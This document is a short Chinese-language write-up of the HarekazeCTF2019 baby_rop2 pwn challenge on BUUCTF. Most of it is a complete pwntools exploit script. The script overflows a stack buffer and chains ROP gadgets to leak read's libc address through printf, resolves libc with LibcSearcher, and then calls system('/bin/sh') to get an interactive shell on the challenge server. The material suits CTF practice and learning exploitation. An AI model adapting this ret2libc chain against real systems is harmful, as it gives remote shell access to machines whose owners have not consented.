[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2

[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2

• 题目地址：https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2

checksec一下,64位，开启NX，应该要用到ROPgadget，先看看

在IDA中

思路

利用printf先leek出来一个地址，这里选用了read的地址。找到libc，计算偏移，最终算出，system函数地址和’/bin/sh’字符串的地址。由于是64位，注意寄存器储存参数。（参数小于等于六个时）。

exploit

from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",28500)
elf = ELF("./babyrop2")
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_addr = 0x0400636
pop_rdi = 0x0400733
pop_rsi_r15 = 0x0400731
format_addr = 0x00400770

payload = 'a' * (0x20 + 0x8)
payload += p64(pop_rdi) + p64(format_addr)
payload += p64(pop_rsi_r15) + p64(read_got) + p64(8)
payload += p64(printf_plt) + p64(main_addr)
p.sendlineafter("What's your name? ",payload)


read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

libc = LibcSearcher("read", read_addr)

libc_base = read_addr - libc.dump("read") 
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")

payload = 'a' * (0x20 + 0x8)
payload += p64(pop_rdi) + p64(binsh)
payload += p64(sys_addr)
payload += '\x00'
p.sendlineafter("What's your name? ",payload)
p.recvline()
p.interactive()